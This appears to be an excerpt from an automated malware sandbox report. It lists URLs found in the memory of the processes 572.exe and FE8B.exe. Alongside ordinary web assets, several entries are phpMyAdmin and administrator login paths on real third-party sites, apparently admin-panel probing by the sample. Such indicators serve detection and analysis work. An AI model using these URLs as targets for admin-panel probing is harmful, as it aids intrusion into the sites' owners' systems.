                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us-central1-gcp.api.snapchat.com
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/css/all.min.css
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/css/fonts/internacional.min.css
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/css/vue/zoom-components.min.css
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/image/icon/icon-arrow-down-blue.svg
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/image/new/error/error404_full.jpg
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/js/all.min.js
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/js/app/common/monitor.min.js
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/js/lib/vue/advanced/notification/notification.min.css
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/static/6.3.19146/js/lib/vue/advanced/notification/notification.min.js
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st1.zoom.us/zoom.ico
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st2.zoom.us/cdn-detect.png
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st2.zoom.us/static/6.3.19146/image/new/error/error404.jpg
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st2.zoom.us/static/6.3.19146/image/new/topNav/Resources-ZoomClient.png
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st2.zoom.us/static/6.3.19146/image/new/topNav/Zoom_logo.svg
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st2.zoom.us/static/6.3.19146/js/app/top_nav.min.js
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st2.zoom.us/static/6.3.19146/js/lib/vue/zoom-components.min.js
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zg
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.1
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/css/fonts/suisse.min.css
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/css/meetings/meeting_delete_dialog.min.css
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/css/top_nav.min.css
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/image/icon/icon-arrow-down.svg
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/image/marketing/privacyoptions.svg
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/image/new/topNav/Resources-VirtualBG.svg
                Source: 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/image/new/topNav/nav-sprites.svg
                Source: 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/image/thumb.png
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/js/app/jquery.validate.message.min.js
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/js/app/market_onetrust_cookie.min.js
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/js/lib/vue/advanced/popup-captcha/popup-captcha.min.css
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/js/lib/vue/advanced/popup-captcha/popup-captcha.min.js
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zoom.us/static/6.3.19146/js/lib/vue/vue.min.js
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04st3.zq
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us
                Source: 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/account
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/download
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/download#chrome_ext
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/download#client_4meeting
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/download#lync_plugin
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/download#mobile_app
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/download#outlook_plugin
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/download#room_client
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/error/404
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/events
                Source: 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/join
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/phpmyadmin/yAdmin/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/signin
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/signup
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://us04web.zoom.us/test
                Source: 572.exe, 00000009.00000003.4196885790.0000000047B06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004023B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/nkw3plr.css
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://v.xsanime.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://v.xsanime.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://v.xsanime.com/phpmyadmin/R
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://v.xsanime.com/phpmyadmin/pmyadmin/
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://videojs.github.io/video.js/video-js/skins/vim.css
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://virtuadopt.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://virtuadopt.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://virtuadopt.com/phpmyadmin/21sv
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://virtuadopt.com/phpmyadmin3/~
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vjs.zencdn.net/8.0.4/video-js.css
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warriorplus-1.firebaseio.com
                Source: 572.exe, 00000009.00000003.4388544265.0000000040136000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warriorplus.com/images/warriorplus-logo-256x256.png
                Source: 572.exe, 00000009.00000003.4388544265.0000000040136000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warriorplus.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warriorplus.com/phpmyadmin/m)M
                Source: 572.exe, 00000009.00000003.4337138614.000000004DB05000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warriorplus.com:443/administrator/
                Source: 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warriorplus.com:443/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warriorplus.com:443/phpmyadmin/sni.cloudflaressl.comc
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-frontend-dot-sc-analytics.appspot.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.snapchat.com/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webstatic-sea.hoyoverse.com/upload/static-resource/2021/10/15/22f27ca97c50aa5ea6c7dd6e32967b
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webstatic-sea.hoyoverse.com/upload/static-resource/2021/10/15/bf61d4793cb5bad18d56a17f3bc8a2
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webstatic-sea.hoyoverse.com/upload/static-resource/2021/10/15/bff105936d378d5335b3fddd9c1662
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webstatic-sea.hoyoverse.com/upload/static-resource/2021/10/15/d2db1ea9f686ab95c6ee6a17c2cb7f
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://widget.intercom.io/widget/jb72teiz
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000002.00000000.2125091063.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
                Source: explorer.exe, 00000002.00000000.2127512556.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.analvids.com/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.analvids.com/administrator/&(
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.analvids.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.analvids.com/phpmyadmin/o
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDF8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.casinocontroller.com/admin/istrator/index.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.casinocontroller.com/admin/istrator/index.php:
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001187000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2450496543.000000000118A000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3906194985.00000000640EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AB3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B19000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039199000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304456912.0000000040090000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4388544265.000000004012C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B22000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.00000000061B3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4513550067.000000004E073000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4513550067.000000004E067000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4163206048.000000004015F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.00000000402AF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001187000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/ddos/glossary/malware/
                Source: 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dragonbyte-tech.com/?utm_source=netizion.com&utm_campaign=site&utm_medium=footer&utm_con
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dragonbyte-tech.com/store/categories/xenforo.5/?utm_source=netizion.com&utm_campaign=sit
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dragonbyte-tech.com/store/details/?products=339
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/js
                Source: 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/jsapi
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LfZOoUUAAAAAIBHzCuLY_Gek6NbGm-ohefXhMx5
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleadservices.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: 572.exe, 00000009.00000003.4402104725.0000000063F8F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-BSTD50YB50
                Source: 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-QZMBY25EVW
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-R4LNDD9YJ3
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-142153722-1
                Source: 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-152622256-1
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-75635721-1
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-WMGQ2M
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
